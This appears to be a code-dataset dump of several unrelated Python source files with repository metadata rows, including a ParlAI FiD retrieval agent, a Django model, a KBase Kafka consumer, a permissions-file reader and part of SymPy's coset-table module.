help='split the docs by white space (word) or dict tokens.',
)
group.add_argument(
'--n-ranked-doc-chunks',
type=int,
default=1,
help='Number of document chunks to keep if documents is too long and has to be splitted.',
)
group.add_argument(
'--doc-chunks-ranker',
type=str,
choices=['tfidf', 'head', 'woi_chunk_retrieved_docs'],
default='head',
help='How to rank doc chunks.',
)
parser.add_argument(
'--woi-doc-chunk-size',
default=500,
type=int,
help='Document chunk size (in characters).',
)
return parser
class SearchQuerySearchEngineFiDAgent(SearchQueryFiDAgent):
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.SEARCH_ENGINE.value
super().__init__(opt, shared=shared)
@classmethod
def add_cmdline_args(cls, parser, partial_opt=None):
super().add_cmdline_args(parser, partial_opt=partial_opt)
group = parser.add_argument_group('Search Engine FiD Params')
group.add_argument('--search-server', type=str, help='A search server address.')
return parser
class SearchQueryFAISSIndexFiDAgent(SearchQueryFiDAgent):
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.SEARCH_TERM_FAISS.value
super().__init__(opt, shared=shared)
class GoldDocRetrieverFiDAgent(SearchQueryFiDAgent):
"""
Uses the gold retrieved docs (documents shown to crowdsourcing agents).
This FiD agents has a mock retriever that picks the retrieved docs from the observed
example.
"""
def __init__(self, opt: Opt, shared: TShared = None):
opt = deepcopy(opt)
opt['rag_retriever_type'] = RetrieverType.OBSERVATION_ECHO_RETRIEVER.value
self._n_docs = opt['n_docs']
if opt['rag_retriever_query'] != 'full_history':
prev_sel = opt['rag_retriever_query']
opt['rag_retriever_query'] = 'full_history'
logging.warning(
'GoldDocRetrieverFiDAgent only works with `rag_retriever_query` being `"full_history"`. '
f'Changing opt value for `rag_retriever_query`: `"{prev_sel}"` -> `"full_history"`'
)
super().__init__(opt, shared=shared)
@abstractmethod
def get_retrieved_knowledge(self, message):
"""
Extracts the retrieved knowledge from the message.
"""
def show_observation_to_echo_retriever(self, observation: Message):
retrieved_docs = self.get_retrieved_knowledge(observation)
if len(retrieved_docs) > self._n_docs:
logging.warning(
f'Your `get_retrieved_knowledge` method returned {len(retrieved_docs)} Documents, '
f'instead of the expected {self._n_docs} (set by `--n-docs`). '
f'This agent will only use the first {self._n_docs} Documents. '
'Consider modifying your implementation of `get_retrieved_knowledge` to avoid unexpected results. '
'(or alternatively you may increase `--n-docs` parameter)'
)
retrieved_docs = retrieved_docs[: self._n_docs]
self.model_api.retriever.add_retrieve_doc(
observation[self._query_key], retrieved_docs
)
def _set_query_vec(self, observation: Message) -> Message:
self.show_observation_to_echo_retriever(observation)
super()._set_query_vec(observation)
class WizIntGoldDocRetrieverFiDAgent(GoldDocRetrieverFiDAgent):
"""
Gold knowledge FiD agent for the Wizard of Internet task.
"""
def _extract_doc_from_message(self, message: Message, idx: int):
"""
Returns the `idx`-th `__retrieved-docs__` in the `message` as a Document object.
"""
return Document(
docid=message[consts.RETRIEVED_DOCS_URLS][idx],
title=message[consts.RETRIEVED_DOCS_TITLES][idx],
text=message[consts.RETRIEVED_DOCS][idx],
)
def get_retrieved_knowledge(self, message: Message):
retrieved_docs = []
if not message.get(consts.RETRIEVED_DOCS):
return retrieved_docs
# First adding the docs with selected sentences.
selected_sentences = message[consts.SELECTED_SENTENCES]
n_docs_in_message = len(message[consts.RETRIEVED_DOCS])
already_added_doc_idx = []
if ' '.join(selected_sentences) == consts.NO_SELECTED_SENTENCES_TOKEN:
return retrieved_docs # `retrieved_docs` is empty at this point
for doc_idx in range(n_docs_in_message):
doc_content = message[consts.RETRIEVED_DOCS][doc_idx]
for sel_sentc in selected_sentences:
if sel_sentc in doc_content:
retrieved_docs.append(
self._extract_doc_from_message(message, doc_idx)
)
already_added_doc_idx.append(doc_idx)
break
if len(retrieved_docs) == self._n_docs and doc_idx != (self._n_docs - 1):
logging.warning(
f'More than {self._n_docs} documents have selected sentences. Trimming them to the first {self._n_docs}'
)
break
# Then adding other (filler) docs.
# We add them by iterating forward in the __retrieved-docs__ list for repeatability,
# but we shuffle the order of the final retruned docs, to make sure model doesn't cheat.
for doc_idx in range(n_docs_in_message):
if len(retrieved_docs) == self._n_docs:
break
if doc_idx in already_added_doc_idx:
continue
retrieved_docs.append(self._extract_doc_from_message(message, doc_idx))
if n_docs_in_message > len(retrieved_docs):
logging.debug(
f'Trimmed retrieved docs from {n_docs_in_message} to {len(retrieved_docs)}'
)
random.shuffle(retrieved_docs)
return retrieved_docs
def concat_enc_outs(
input: torch.LongTensor,
enc_out: torch.Tensor,
mask: torch.BoolTensor,
embedding_size: int,
padding_idx: int,
) -> Tuple[torch.Tensor, torch.BoolTensor]:
"""
Concatenate Encoder Outputs.
Does the whole "FiD" thing; each query/document pair is independently encoded in the
Encoder, so we need to concatenate all the outputs prior to sending to the decoder.
:param input:
[bsz, seqlen] original input to the encoder
:param enc_out:
[bsz * n_docs, seqlen] output representations from the encoder
:param mask:
encoder mask
:param embedding_size:
emb/hidden size of the enc representations
:param padding_idx:
pad token index; used for mask purposes.
:return (new_out, new_mask):
return the encoder output and encoder mask, appropriately concatenated.
"""
bsz, n_docs = input.size(0), enc_out.size(0) // input.size(0)
split_enc_out = enc_out.split([n_docs] * bsz, dim=0)
split_mask = mask.split([n_docs] * bsz, dim=0)
concat_outs: List[torch.Tensor] = []
concat_lengths = []
for i in range(bsz):
mask_i = split_mask[i].view(-1)
out_i = split_enc_out[i].reshape(-1, embedding_size)[mask_i]
concat_outs.append(out_i)
concat_lengths.append(out_i.size(0))
new_out = enc_out.new(bsz, max(concat_lengths), embedding_size)
new_mask: torch.BoolTensor = mask.new(bsz, max(concat_lengths)) # type: ignore
new_out.fill_(padding_idx)
new_mask.fill_(False)
for i, (out_i, length_i) in enumerate(zip(concat_outs, concat_lengths)):
new_out[i, :length_i] = out_i
new_mask[i, :length_i] = True
return new_out, new_mask
| [
"noreply@github.com"
] | noreply@github.com |
105947379a933fb3d9c7594e0f9ee5edef5ec989 | 659836ef3a9ac558538b016dbf4e128aa975ae7c | /backend/ingredient/models.py | ba8262719d98f47795c66d3d2646c01dcfba676b | [] | no_license | zzerii/save_your_ingredients | fda1c769d158bca9dfd3c28ac9ff34ed7ae4e6a3 | 5ebde82255c1a6edf0c19d9032015d05c9d0abc9 | refs/heads/master | 2023-02-21T22:19:28.954594 | 2021-01-22T11:39:16 | 2021-01-22T11:39:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | from django.db import models
# Create your models here.
class Ingredient(models.Model):
name = models.CharField(max_length=255)
info = models.CharField(max_length=255)
trim = models.CharField(max_length=255)
| [
"jinsoo941010@naver.com"
] | jinsoo941010@naver.com |
754d441707341b8ba8d827ed526ecce1b52c54ed | fd4dd0ce51eb1c9206d5c1c29d6726fc5f2cb122 | /src/kafka_consumer.py | 2c15842317f104c1081a9e44920ee8bec1234986 | [] | no_license | kbaseapps/relation_engine_sync | 0a9ae11326245b98bd173d77203ff49ccd222165 | def99d329d0d4101f3864e21a3e1a6ecb34fa6e0 | refs/heads/master | 2020-04-12T13:07:27.771094 | 2019-08-05T23:53:50 | 2019-08-05T23:53:50 | 162,512,534 | 0 | 0 | null | 2019-08-05T23:53:51 | 2018-12-20T01:56:13 | Python | UTF-8 | Python | false | false | 3,996 | py | """
Consume workspace update events from kafka.
"""
import json
import traceback
from confluent_kafka import Consumer, KafkaError
from src.utils.logger import log
from src.utils.config import get_config
from src.utils.workspace_client import download_info
from src.utils.re_client import check_doc_existence
from src.import_object import import_object
_CONFIG = get_config()
def run():
"""Run the main event loop, ie. the Kafka Consumer, dispatching to self._handle_message."""
topics = [
_CONFIG['kafka_topics']['workspace_events'],
_CONFIG['kafka_topics']['re_admin_events']
]
log('INFO', f"Subscribing to: {topics}")
log('INFO', f"Client group: {_CONFIG['kafka_clientgroup']}")
log('INFO', f"Kafka server: {_CONFIG['kafka_server']}")
consumer = Consumer({
'bootstrap.servers': _CONFIG['kafka_server'],
'group.id': _CONFIG['kafka_clientgroup'],
'auto.offset.reset': 'earliest',
'enable.auto.commit': True
})
consumer.subscribe(topics)
while True:
msg = consumer.poll(timeout=0.5)
if msg is None:
continue
if msg.error():
if msg.error().code() == KafkaError._PARTITION_EOF:
log('INFO', 'End of stream.')
else:
log('ERROR', f"Kafka message error: {msg.error()}")
continue
val = msg.value().decode('utf-8')
try:
msg = json.loads(val)
log('INFO', f'New message: {msg}')
_handle_msg(msg)
except Exception as err:
log('ERROR', '=' * 80)
log('ERROR', f"Error importing:\n{type(err)} - {err}")
log('ERROR', msg)
log('ERROR', err)
# Prints to stderr
traceback.print_exc()
log('ERROR', '=' * 80)
consumer.close()
def _handle_msg(msg):
"""Receive a kafka message."""
event_type = msg.get('evtype')
wsid = msg.get('wsid')
if not wsid:
raise RuntimeError(f'Invalid wsid in event: {wsid}')
if not event_type:
raise RuntimeError(f"Missing 'evtype' in event: {msg}")
log('INFO', f'Received {msg["evtype"]} for {wsid}/{msg.get("objid", "?")}')
if event_type in ['IMPORT', 'NEW_VERSION', 'COPY_OBJECT', 'RENAME_OBJECT']:
_import_obj(msg)
elif event_type == 'IMPORT_NONEXISTENT':
_import_nonexistent(msg)
elif event_type == 'OBJECT_DELETE_STATE_CHANGE':
_delete_obj(msg)
elif event_type == 'WORKSPACE_DELETE_STATE_CHANGE':
_delete_ws(msg)
elif event_type in ['CLONE_WORKSPACE', 'IMPORT_WORKSPACE']:
_import_ws(msg)
elif event_type == 'SET_GLOBAL_PERMISSION':
_set_global_perms(msg)
else:
raise RuntimeError(f"Unrecognized event {event_type}.")
def _import_obj(msg):
log('INFO', 'Downloading obj')
obj_info = download_info(msg['wsid'], msg['objid'], msg.get('ver'))
import_object(obj_info)
def _import_nonexistent(msg):
"""Import an object only if it does not exist in RE already."""
upa = ':'.join([str(p) for p in [msg['wsid'], msg['objid'], msg['ver']]])
log('INFO', f'_import_nonexistent on {upa}') # TODO
_id = 'wsfull_object_version/' + upa
exists = check_doc_existence(_id)
if not exists:
_import_obj(msg)
def _delete_obj(msg):
"""Handle an object deletion event (OBJECT_DELETE_STATE_CHANGE)"""
log('INFO', '_delete_obj TODO') # TODO
raise NotImplementedError()
def _delete_ws(msg):
"""Handle a workspace deletion event (WORKSPACE_DELETE_STATE_CHANGE)."""
log('INFO', '_delete_ws TODO') # TODO
raise NotImplementedError()
def _import_ws(msg):
"""Import all data for an entire workspace."""
log('INFO', '_import_ws TODO') # TODO
raise NotImplementedError()
def _set_global_perms(msg):
"""Set permissions for an entire workspace (SET_GLOBAL_PERMISSION)."""
log('INFO', '_set_global_perms TODO') # TODO
raise NotImplementedError()
| [
"jayrbolton@gmail.com"
] | jayrbolton@gmail.com |
7a93ea17532155af61fa6a4e41ee4610814e7864 | aaaa16d4de4d3a1291d2abcf0d749302474eb28a | /ex40(3).py | 7d1b164829f9a50300fbdf507cbbef8dd5d4a284 | [] | no_license | A-lPha/-python- | 6f2ae557919db3dc87cce398c4800fadf4c24c2c | f9996781e9198d75c2ff1dbaa0bc508b0446e046 | refs/heads/master | 2021-01-12T08:25:03.622928 | 2016-12-15T14:58:02 | 2016-12-15T14:58:02 | 76,568,773 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | while True:
cmd = raw_input("""
1.User information
2.Setup
3.Exit
""")
print "您输入的是",cmd
#帮群里一个新手解决的问题
| [
"noreply@github.com"
] | noreply@github.com |
81f995d260348ae063f7f2e60b454ad287d540e5 | 28871da79ccc0e0200a69fd629ff71de48d5b8ac | /read_log_xml_permission_file.py | 1ca06476423eb600e8d974e8193cde711b4aac98 | [] | no_license | maijaz01/django_blog | 2ffbf2537871e8da5c317d085bbc8570fa76431f | ebd91b868ebca56f1d5224ba279c706a47f98888 | refs/heads/master | 2016-09-06T02:49:43.044275 | 2015-09-07T15:12:02 | 2015-09-07T15:12:02 | 32,886,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | import os
import pickle
import xml.etree.ElementTree as ET
class Permission(object):
def read_file(self):
""" This method will read file extention and call to respective method to get result
"""
cur_dir = os.path.dirname(__file__)
permissions_log = os.path.join(cur_dir, "permissions.xml")
if permissions_log.split('.')[1]=='log':
self.getLogFile(permissions_log)
else:
self.getXMLFile(permissions_log)
def getLogFile(self, permissions_log):
"""This method convert pickle file and return dictionaries"""
key_dict = {}
if os.path.exists(permissions_log):
fo = open(permissions_log,'U')
file_log = pickle.load(fo)
for key, value in file_log.items():
if key[0] in key_dict.keys():
key_dict[key[0]].append({key[1]:[value]})
else:
key_dict[key[0]] = [{key[1]:[value]}]
print key_dict
def getXMLFile(self, permissions_log):
"""This method read the xml file and convert into dictionaries
"""
xml_dict = {}
if os.path.exists(permissions_log):
fo = open(permissions_log,'U')
xml_obj = ET.parse(fo)
root = xml_obj.getroot()
for child in root:
for item in child.findall("Item"):
if child.tag in xml_dict.keys():
xml_dict[child.tag].append({item.items()[1][1]:[item.text]})
else:
xml_dict[child.tag]=[{item.items()[1][1]:[item.text]}]
print xml_dict
if __name__=="__main__":
Permission=Permission()
Permission.read_file()
| [
"maijaz@zeomega.com"
] | maijaz@zeomega.com |
ab2ba507d79c1f6cd39af6514a155a35cc16393b | 18b452faa903176e5f0414aa1ae8b99097cc89b8 | /main_app/forms.py | 3549de084218a6587ea84d952a77617bf2a2837e | [] | no_license | th3dougler/collectorcollector | a6c237ed2ebb94d0f4ae8bb7aa4046893b90b1c0 | b0b815b010557e447cc0cec3bb9af78ebe4ef7bf | refs/heads/main | 2023-04-08T15:09:40.823298 | 2021-04-02T02:15:18 | 2021-04-02T02:15:18 | 352,772,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | from django.forms import ModelForm
from .models import WhatGoesIn, Common_Feature
class WhatGoesInForm(ModelForm):
class Meta:
model = WhatGoesIn
fields = ['name', 'colour']
class CommonFeatureForm(ModelForm):
class Meta:
model = Common_Feature
fields = ['name'] | [
"th3dougler@gmail.com"
] | th3dougler@gmail.com |
9116fbcd17562627c4d5504fdc5b28015b3d830d | 6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8 | /algorithms/algorithms-python/leetcode/Question_111_Minimum_Depth_of_Binary_Tree.py | 20e53e489f88b9f32c07604bd8be49b4895f2660 | [] | no_license | Lanceolata/code | aae54af632a212c878ce45b11dab919bba55bcb3 | f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb | refs/heads/master | 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | #!/usr/bin/python
# coding: utf-8
from TreeNode import *
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def minDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if not root:
return 0
left = self.minDepth(root.left)
right = self.minDepth(root.right)
return left + right + 1 if left == 0 or right == 0 else min(left, right) + 1
| [
"lanceolatayuan@gmail.com"
] | lanceolatayuan@gmail.com |
ec9388dc3dd1fce8c32eb599783e32c21d108f8a | 00a9295409b78a53ce790f7ab44931939f42c0e0 | /FPGA/apio/iCEBreaker/FIR_Filter/sympy/venv/lib/python3.8/site-packages/sympy/combinatorics/coset_table.py | 9e9b2b0f7ecf107a58a2d1ab311db0f412135e86 | [
"Apache-2.0"
] | permissive | klei22/Tech-OnBoarding-Class | c21f0762d2d640d5e9cb124659cded5c865b32d4 | 960e962322c37be9117e0523641f8b582a2beceb | refs/heads/master | 2022-11-10T13:17:39.128342 | 2022-10-25T08:59:48 | 2022-10-25T08:59:48 | 172,292,871 | 2 | 3 | Apache-2.0 | 2019-05-19T00:26:32 | 2019-02-24T03:50:35 | C | UTF-8 | Python | false | false | 42,977 | py | from sympy.combinatorics.free_groups import free_group
from sympy.printing.defaults import DefaultPrinting
from itertools import chain, product
from bisect import bisect_left
###############################################################################
# COSET TABLE #
###############################################################################
class CosetTable(DefaultPrinting):
# coset_table: Mathematically a coset table
# represented using a list of lists
# alpha: Mathematically a coset (precisely, a live coset)
# represented by an integer between i with 1 <= i <= n
# alpha in c
# x: Mathematically an element of "A" (set of generators and
# their inverses), represented using "FpGroupElement"
# fp_grp: Finitely Presented Group with < X|R > as presentation.
# H: subgroup of fp_grp.
# NOTE: We start with H as being only a list of words in generators
# of "fp_grp". Since `.subgroup` method has not been implemented.
r"""
Properties
==========
[1] `0 \in \Omega` and `\tau(1) = \epsilon`
[2] `\alpha^x = \beta \Leftrightarrow \beta^{x^{-1}} = \alpha`
[3] If `\alpha^x = \beta`, then `H \tau(\alpha)x = H \tau(\beta)`
[4] `\forall \alpha \in \Omega, 1^{\tau(\alpha)} = \alpha`
References
==========
.. [1] Holt, D., Eick, B., O'Brien, E.
"Handbook of Computational Group Theory"
.. [2] John J. Cannon; Lucien A. Dimino; George Havas; Jane M. Watson
Mathematics of Computation, Vol. 27, No. 123. (Jul., 1973), pp. 463-490.
"Implementation and Analysis of the Todd-Coxeter Algorithm"
"""
# default limit for the number of cosets allowed in a
# coset enumeration.
coset_table_max_limit = 4096000
# limit for the current instance
coset_table_limit = None
# maximum size of deduction stack above or equal to
# which it is emptied
max_stack_size = 100
def __init__(self, fp_grp, subgroup, max_cosets=None):
if not max_cosets:
max_cosets = CosetTable.coset_table_max_limit
self.fp_group = fp_grp
self.subgroup = subgroup
self.coset_table_limit = max_cosets
# "p" is setup independent of Omega and n
self.p = [0]
# a list of the form `[gen_1, gen_1^{-1}, ... , gen_k, gen_k^{-1}]`
self.A = list(chain.from_iterable((gen, gen**-1) \
for gen in self.fp_group.generators))
#P[alpha, x] Only defined when alpha^x is defined.
self.P = [[None]*len(self.A)]
# the mathematical coset table which is a list of lists
self.table = [[None]*len(self.A)]
self.A_dict = {x: self.A.index(x) for x in self.A}
self.A_dict_inv = {}
for x, index in self.A_dict.items():
if index % 2 == 0:
self.A_dict_inv[x] = self.A_dict[x] + 1
else:
self.A_dict_inv[x] = self.A_dict[x] - 1
# used in the coset-table based method of coset enumeration. Each of
# the element is called a "deduction" which is the form (alpha, x) whenever
# a value is assigned to alpha^x during a definition or "deduction process"
self.deduction_stack = []
# Attributes for modified methods.
H = self.subgroup
self._grp = free_group(', ' .join(["a_%d" % i for i in range(len(H))]))[0]
self.P = [[None]*len(self.A)]
self.p_p = {}
@property
def omega(self):
"""Set of live cosets. """
return [coset for coset in range(len(self.p)) if self.p[coset] == coset]
def copy(self):
"""
Return a shallow copy of Coset Table instance ``self``.
"""
self_copy = self.__class__(self.fp_group, self.subgroup)
self_copy.table = [list(perm_rep) for perm_rep in self.table]
self_copy.p = list(self.p)
self_copy.deduction_stack = list(self.deduction_stack)
return self_copy
def __str__(self):
return "Coset Table on %s with %s as subgroup generators" \
% (self.fp_group, self.subgroup)
__repr__ = __str__
@property
def n(self):
"""The number `n` represents the length of the sublist containing the
live cosets.
"""
if not self.table:
return 0
return max(self.omega) + 1
# Pg. 152 [1]
def is_complete(self):
r"""
The coset table is called complete if it has no undefined entries
on the live cosets; that is, `\alpha^x` is defined for all
`\alpha \in \Omega` and `x \in A`.
"""
return not any(None in self.table[coset] for coset in self.omega)
# Pg. 153 [1]
def define(self, alpha, x, modified=False):
r"""
This routine is used in the relator-based strategy of Todd-Coxeter
algorithm if some `\alpha^x` is undefined. We check whether there is
space available for defining a new coset. If there is enough space
then we remedy this by adjoining a new coset `\beta` to `\Omega`
(i.e to set of live cosets) and put that equal to `\alpha^x`, then
make an assignment satisfying Property[1]. If there is not enough space
then we halt the Coset Table creation. The maximum amount of space that
can be used by Coset Table can be manipulated using the class variable
``CosetTable.coset_table_max_limit``.
See Also
========
define_c
"""
A = self.A
table = self.table
len_table = len(table)
if len_table >= self.coset_table_limit:
# abort the further generation of cosets
raise ValueError("the coset enumeration has defined more than "
"%s cosets. Try with a greater value max number of cosets "
% self.coset_table_limit)
table.append([None]*len(A))
self.P.append([None]*len(self.A))
# beta is the new coset generated
beta = len_table
self.p.append(beta)
table[alpha][self.A_dict[x]] = beta
table[beta][self.A_dict_inv[x]] = alpha
# P[alpha][x] = epsilon, P[beta][x**-1] = epsilon
if modified:
self.P[alpha][self.A_dict[x]] = self._grp.identity
self.P[beta][self.A_dict_inv[x]] = self._grp.identity
self.p_p[beta] = self._grp.identity
def define_c(self, alpha, x):
r"""
A variation of ``define`` routine, described on Pg. 165 [1], used in
the coset table-based strategy of Todd-Coxeter algorithm. It differs
from ``define`` routine in that for each definition it also adds the
tuple `(\alpha, x)` to the deduction stack.
See Also
========
define
"""
A = self.A
table = self.table
len_table = len(table)
if len_table >= self.coset_table_limit:
# abort the further generation of cosets
raise ValueError("the coset enumeration has defined more than "
"%s cosets. Try with a greater value max number of cosets "
% self.coset_table_limit)
table.append([None]*len(A))
# beta is the new coset generated
beta = len_table
self.p.append(beta)
table[alpha][self.A_dict[x]] = beta
table[beta][self.A_dict_inv[x]] = alpha
# append to deduction stack
self.deduction_stack.append((alpha, x))
def scan_c(self, alpha, word):
"""
A variation of ``scan`` routine, described on pg. 165 of [1], which
puts at tuple, whenever a deduction occurs, to deduction stack.
See Also
========
scan, scan_check, scan_and_fill, scan_and_fill_c
"""
# alpha is an integer representing a "coset"
# since scanning can be in two cases
# 1. for alpha=0 and w in Y (i.e generating set of H)
# 2. alpha in Omega (set of live cosets), w in R (relators)
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
f = alpha
i = 0
r = len(word)
b = alpha
j = r - 1
# list of union of generators and their inverses
while i <= j and table[f][A_dict[word[i]]] is not None:
f = table[f][A_dict[word[i]]]
i += 1
if i > j:
if f != b:
self.coincidence_c(f, b)
return
while j >= i and table[b][A_dict_inv[word[j]]] is not None:
b = table[b][A_dict_inv[word[j]]]
j -= 1
if j < i:
# we have an incorrect completed scan with coincidence f ~ b
# run the "coincidence" routine
self.coincidence_c(f, b)
elif j == i:
# deduction process
table[f][A_dict[word[i]]] = b
table[b][A_dict_inv[word[i]]] = f
self.deduction_stack.append((f, word[i]))
# otherwise scan is incomplete and yields no information
# alpha, beta coincide, i.e. alpha, beta represent the pair of cosets where
# coincidence occurs
def coincidence_c(self, alpha, beta):
"""
A variation of ``coincidence`` routine used in the coset-table based
method of coset enumeration. The only difference being on addition of
a new coset in coset table(i.e new coset introduction), then it is
appended to ``deduction_stack``.
See Also
========
coincidence
"""
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
# behaves as a queue
q = []
self.merge(alpha, beta, q)
while len(q) > 0:
gamma = q.pop(0)
for x in A_dict:
delta = table[gamma][A_dict[x]]
if delta is not None:
table[delta][A_dict_inv[x]] = None
# only line of difference from ``coincidence`` routine
self.deduction_stack.append((delta, x**-1))
mu = self.rep(gamma)
nu = self.rep(delta)
if table[mu][A_dict[x]] is not None:
self.merge(nu, table[mu][A_dict[x]], q)
elif table[nu][A_dict_inv[x]] is not None:
self.merge(mu, table[nu][A_dict_inv[x]], q)
else:
table[mu][A_dict[x]] = nu
table[nu][A_dict_inv[x]] = mu
def scan(self, alpha, word, y=None, fill=False, modified=False):
r"""
``scan`` performs a scanning process on the input ``word``.
It first locates the largest prefix ``s`` of ``word`` for which
`\alpha^s` is defined (i.e is not ``None``), ``s`` may be empty. Let
``word=sv``, let ``t`` be the longest suffix of ``v`` for which
`\alpha^{t^{-1}}` is defined, and let ``v=ut``. Then three
possibilities are there:
1. If ``t=v``, then we say that the scan completes, and if, in addition
`\alpha^s = \alpha^{t^{-1}}`, then we say that the scan completes
correctly.
2. It can also happen that scan does not complete, but `|u|=1`; that
is, the word ``u`` consists of a single generator `x \in A`. In that
case, if `\alpha^s = \beta` and `\alpha^{t^{-1}} = \gamma`, then we can
set `\beta^x = \gamma` and `\gamma^{x^{-1}} = \beta`. These assignments
are known as deductions and enable the scan to complete correctly.
3. See ``coicidence`` routine for explanation of third condition.
Notes
=====
The code for the procedure of scanning `\alpha \in \Omega`
under `w \in A*` is defined on pg. 155 [1]
See Also
========
scan_c, scan_check, scan_and_fill, scan_and_fill_c
Scan and Fill
=============
Performed when the default argument fill=True.
Modified Scan
=============
Performed when the default argument modified=True
"""
# alpha is an integer representing a "coset"
# since scanning can be in two cases
# 1. for alpha=0 and w in Y (i.e generating set of H)
# 2. alpha in Omega (set of live cosets), w in R (relators)
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
f = alpha
i = 0
r = len(word)
b = alpha
j = r - 1
b_p = y
if modified:
f_p = self._grp.identity
flag = 0
while fill or flag == 0:
flag = 1
while i <= j and table[f][A_dict[word[i]]] is not None:
if modified:
f_p = f_p*self.P[f][A_dict[word[i]]]
f = table[f][A_dict[word[i]]]
i += 1
if i > j:
if f != b:
if modified:
self.modified_coincidence(f, b, f_p**-1*y)
else:
self.coincidence(f, b)
return
while j >= i and table[b][A_dict_inv[word[j]]] is not None:
if modified:
b_p = b_p*self.P[b][self.A_dict_inv[word[j]]]
b = table[b][A_dict_inv[word[j]]]
j -= 1
if j < i:
# we have an incorrect completed scan with coincidence f ~ b
# run the "coincidence" routine
if modified:
self.modified_coincidence(f, b, f_p**-1*b_p)
else:
self.coincidence(f, b)
elif j == i:
# deduction process
table[f][A_dict[word[i]]] = b
table[b][A_dict_inv[word[i]]] = f
if modified:
self.P[f][self.A_dict[word[i]]] = f_p**-1*b_p
self.P[b][self.A_dict_inv[word[i]]] = b_p**-1*f_p
return
elif fill:
self.define(f, word[i], modified=modified)
# otherwise scan is incomplete and yields no information
# used in the low-index subgroups algorithm
def scan_check(self, alpha, word):
r"""
Another version of ``scan`` routine, described on, it checks whether
`\alpha` scans correctly under `word`, it is a straightforward
modification of ``scan``. ``scan_check`` returns ``False`` (rather than
calling ``coincidence``) if the scan completes incorrectly; otherwise
it returns ``True``.
See Also
========
scan, scan_c, scan_and_fill, scan_and_fill_c
"""
# alpha is an integer representing a "coset"
# since scanning can be in two cases
# 1. for alpha=0 and w in Y (i.e generating set of H)
# 2. alpha in Omega (set of live cosets), w in R (relators)
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
f = alpha
i = 0
r = len(word)
b = alpha
j = r - 1
while i <= j and table[f][A_dict[word[i]]] is not None:
f = table[f][A_dict[word[i]]]
i += 1
if i > j:
return f == b
while j >= i and table[b][A_dict_inv[word[j]]] is not None:
b = table[b][A_dict_inv[word[j]]]
j -= 1
if j < i:
# we have an incorrect completed scan with coincidence f ~ b
# return False, instead of calling coincidence routine
return False
elif j == i:
# deduction process
table[f][A_dict[word[i]]] = b
table[b][A_dict_inv[word[i]]] = f
return True
def merge(self, k, lamda, q, w=None, modified=False):
"""
Merge two classes with representatives ``k`` and ``lamda``, described
on Pg. 157 [1] (for pseudocode), start by putting ``p[k] = lamda``.
It is more efficient to choose the new representative from the larger
of the two classes being merged, i.e larger among ``k`` and ``lamda``.
procedure ``merge`` performs the merging operation, adds the deleted
class representative to the queue ``q``.
Parameters
==========
'k', 'lamda' being the two class representatives to be merged.
Notes
=====
Pg. 86-87 [1] contains a description of this method.
See Also
========
coincidence, rep
"""
p = self.p
rep = self.rep
phi = rep(k, modified=modified)
psi = rep(lamda, modified=modified)
if phi != psi:
mu = min(phi, psi)
v = max(phi, psi)
p[v] = mu
if modified:
if v == phi:
self.p_p[phi] = self.p_p[k]**-1*w*self.p_p[lamda]
else:
self.p_p[psi] = self.p_p[lamda]**-1*w**-1*self.p_p[k]
q.append(v)
def rep(self, k, modified=False):
r"""
Parameters
==========
`k \in [0 \ldots n-1]`, as for ``self`` only array ``p`` is used
Returns
=======
Representative of the class containing ``k``.
Returns the representative of `\sim` class containing ``k``, it also
makes some modification to array ``p`` of ``self`` to ease further
computations, described on Pg. 157 [1].
The information on classes under `\sim` is stored in array `p` of
``self`` argument, which will always satisfy the property:
`p[\alpha] \sim \alpha` and `p[\alpha]=\alpha \iff \alpha=rep(\alpha)`
`\forall \in [0 \ldots n-1]`.
So, for `\alpha \in [0 \ldots n-1]`, we find `rep(self, \alpha)` by
continually replacing `\alpha` by `p[\alpha]` until it becomes
constant (i.e satisfies `p[\alpha] = \alpha`):w
To increase the efficiency of later ``rep`` calculations, whenever we
find `rep(self, \alpha)=\beta`, we set
`p[\gamma] = \beta \forall \gamma \in p-chain` from `\alpha` to `\beta`
Notes
=====
``rep`` routine is also described on Pg. 85-87 [1] in Atkinson's
algorithm, this results from the fact that ``coincidence`` routine
introduces functionality similar to that introduced by the
``minimal_block`` routine on Pg. 85-87 [1].
See Also
========
coincidence, merge
"""
p = self.p
lamda = k
rho = p[lamda]
if modified:
s = p[:]
while rho != lamda:
if modified:
s[rho] = lamda
lamda = rho
rho = p[lamda]
if modified:
rho = s[lamda]
while rho != k:
mu = rho
rho = s[mu]
p[rho] = lamda
self.p_p[rho] = self.p_p[rho]*self.p_p[mu]
else:
mu = k
rho = p[mu]
while rho != lamda:
p[mu] = lamda
mu = rho
rho = p[mu]
return lamda
# alpha, beta coincide, i.e. alpha, beta represent the pair of cosets
# where coincidence occurs
def coincidence(self, alpha, beta, w=None, modified=False):
r"""
The third situation described in ``scan`` routine is handled by this
routine, described on Pg. 156-161 [1].
The unfortunate situation when the scan completes but not correctly,
then ``coincidence`` routine is run. i.e when for some `i` with
`1 \le i \le r+1`, we have `w=st` with `s=x_1*x_2 ... x_{i-1}`,
`t=x_i*x_{i+1} ... x_r`, and `\beta = \alpha^s` and
`\gamma = \alph^{t-1}` are defined but unequal. This means that
`\beta` and `\gamma` represent the same coset of `H` in `G`. Described
on Pg. 156 [1]. ``rep``
See Also
========
scan
"""
A_dict = self.A_dict
A_dict_inv = self.A_dict_inv
table = self.table
# behaves as a queue
q = []
if modified:
